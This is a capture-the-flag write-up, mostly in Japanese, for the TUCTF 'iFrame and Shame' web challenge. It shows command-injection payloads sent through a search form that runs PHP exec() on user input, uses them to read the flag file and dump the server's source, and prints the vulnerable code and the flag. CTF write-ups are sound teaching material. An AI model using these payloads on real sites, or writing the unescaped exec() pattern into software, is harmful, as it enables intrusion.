CTFtime.org

iFrame and Shame

by kazkiti / PwnaSonic

Tags: web oscommandinjection 

Rating:

# ▼▼▼iFrame and Shame(Web:300)、64/948team=6.8%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

---

```
I overheard some guys bragging about how they have a custom Youtube search bar on their site. Put them to shame.

Note: The input from the search bar should be passed to a script that queries youtube using "youtube.com/results?search_query=[your query]". Then it will put it in an iframe. You are only seeing the one video because it is the default upon error.

http://iframeshame.tuctf.com
```

-----

【機能】

・任意の文字列を入力して検索すると、該当するyoutube動画のURLが得られて再生される。

・検索に引っかからなければ、defaultの動画のURLが得られて再生される。

-----

```
POST / HTTP/1.1
Host: iframeshame.tuctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

search=youtube.com/results?search_query="|ls||a+#&Submit=%E9%80%81%E4%BF%A1
```

`<iframe width="560" height="315" src="search.py?autoplay=1" frameborder="0" allowfullscreen></iframe>`

`search.py`が存在するのがわかった。

1行しか取得できていない可能性がある。

-----

ファイル名を`a*~z*`まで実行してみると、下記3つのファイルが検索にひっかかった。

`search=youtube.com/results?search_query="|ls+f*||a+#&Submit=%E9%80%81%E4%BF%A1`

`<iframe width="560" height="315" src="flag?autoplay=1" frameborder="0" allowfullscreen></iframe>`

`flag`ファイルは存在する

-----

`search=youtube.com/results?search_query="|ls+i*||a+#&Submit=%E9%80%81%E4%BF%A1`

`<iframe width="560" height="315" src="index.php?autoplay=1" frameborder="0" allowfullscreen></iframe>`

`index.php`ファイルは存在する

-----

`search=youtube.com/results?search_query="|ls+s*||a+#&Submit=%E9%80%81%E4%BF%A1`

`search.py`ファイルは存在する

-----

`search=youtube.com/results?search_query="|cat+flag||a+#&Submit=%E9%80%81%E4%BF%A1`

`<iframe width="560" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1" frameborder="0" allowfullscreen></iframe>`

Rick Astley - Never Gonna Give You Upという歌。偽flag?

1行しか表示されないので、工夫する必要がある。

-----

`head+-n+1+flag`で、行数を指定して全て取得していく

`search=youtube.com/results?search_query="|head+-n+1+flag||a+#&Submit=%E9%80%81%E4%BF%A1`

```
HTTP/1.1 200 OK
Date: Sun, 26 Nov 2017 05:27:13 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html; charset=UTF-8

<form name="searchform" method="POST" action="">
<input id="search" type="text" name="search"/>
<input type="submit" name="Submit"/>
</form>

TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

<iframe width="560" height="315" src="https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>
```

`TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}`

-----

(参考:ソースコードの取得)

次は、`search.py`を取得する

```
search=youtube.com/results?search_query="|head+-n+1+search.py||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+2+search.py||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+3+search.py||a+#&Submit=%E9%80%81%E4%BF%A1
・・・・
```

```
<iframe width="560" height="315" src="#!/usr/bin/python?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="import urllib?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="import urllib2?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="from sys import argv, exit?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="from bs4 import BeautifulSoup?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="if len(argv) < 2:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" with open('error.log','a') as f:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" f.write('Usage: %s query [error log file (default: error.log)]\n' % argv[0])?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" print 'error.log'?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" exit(1)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="q = argv[1]?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="query = urllib.quote(q)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="url = "https://www.youtube.com/results?search_query=" + query?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="response = urllib2.urlopen(url)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="html = response.read()?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="soup = BeautifulSoup(html, 'lxml')?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="found = False?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'}):?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" if not vid['href'].startswith("https://googleads.g.doubleclick.net/"):?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" print 'https://www.youtube.com/embed/' + vid['href'].split('=')[1]?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" found = True?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" break?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=""""?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="if not found:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" if len(argv) == 3:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" fn = argv[2]?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" else:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" fn = 'error.log'?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" with open('error.log','a') as f:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" f.write('Video not found\n')?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" print fn?autoplay=1" frameborder="0" allowfullscreen></iframe>
```

```
#!/usr/bin/python
import urllib
import urllib2
from sys import argv, exit
from bs4 import BeautifulSoup
if len(argv) < 2:
with open('error.log','a') as f:
f.write('Usage: %s query [error log file (default: error.log)]\n' % argv[0])
print 'error.log'
exit(1)
q = argv[1]
query = urllib.quote(q)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, 'lxml')
found = False
for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'}):
if not vid['href'].startswith("https://googleads.g.doubleclick.net/"):
print 'https://www.youtube.com/embed/' + vid['href'].split('=')[1]
found = True
break
"""
if not found:
if len(argv) == 3:
fn = argv[2]
else:
fn = 'error.log'
with open('error.log','a') as f:
f.write('Video not found\n')
print fn
```

-----

次は、`index.php`を取得する

```
search=youtube.com/results?search_query="|head+-n+1+index.php||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+2+index.php||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+3+index.php||a+#&Submit=%E9%80%81%E4%BF%A1
・・・
```

```
<iframe width="560" height="315" src="<form name="searchform" method="POST" action="">?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" <input id="search" type="text" name="search"/>?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" <input type="submit" name="Submit"/>?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="</form>?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="<?php?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="if (!isset($_POST['Submit']))?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="{?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo '<iframe width="560" height="315" src="https://www.youtube.com/embed/JIuYQ_4TcXg?start=9&autoplay=1" frameborder="0" allowfullscreen></iframe>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="}?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="else?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="{?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" $vid = exec('./search.py "' . $_POST['search'] . '"');?autoplay=1" frameborder="0" allowfullscreen></iframe>
TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

<iframe width="560" height="315" src="https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" if (strpos($vid, $flag) === false)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" {?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo '<iframe width="560" height="315" src="' . $vid . '?autoplay=1" frameborder="0" allowfullscreen></iframe>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" }?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" else?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" {?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo $flag . '<br/><br/>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" $vid = 'https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo '<iframe width="560" height="315" src="' . $vid . '" frameborder="0" allowfullscreen></iframe>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" }?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="}?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="?>?autoplay=1" frameborder="0" allowfullscreen></iframe>
```

```
<form name="searchform" method="POST" action="">
<input id="search" type="text" name="search"/>
<input type="submit" name="Submit"/>
</form>
</iframe>';
}
else
{
$vid = exec('./search.py "' . $_POST['search'] . '"');
TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>
if (strpos($vid, $flag) === false)
{
echo '' . $vid . '';
}
else
{
echo $flag . '

';
$vid = 'https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1';
echo '' . $vid . '" frameborder="0" allowfullscreen></iframe>';
}
}
?>
```

※ソースコードを読んで、下記のように変更すると本当のソースコードが得られる。

```
TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>

$flag="TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}";
```

```
<form name="searchform" method="POST" action="">
<input id="search" type="text" name="search"/>
<input type="submit" name="Submit"/>
</form>
</iframe>';
}
else
{
$vid = exec('./search.py "' . $_POST['search'] . '"');
$flag="TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}";
if (strpos($vid, $flag) === false)
{
echo '' . $vid . '';
}
else
{
echo $flag . '

';
$vid = 'https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1';
echo '' . $vid . '" frameborder="0" allowfullscreen></iframe>';
}
}
?>
```

Comments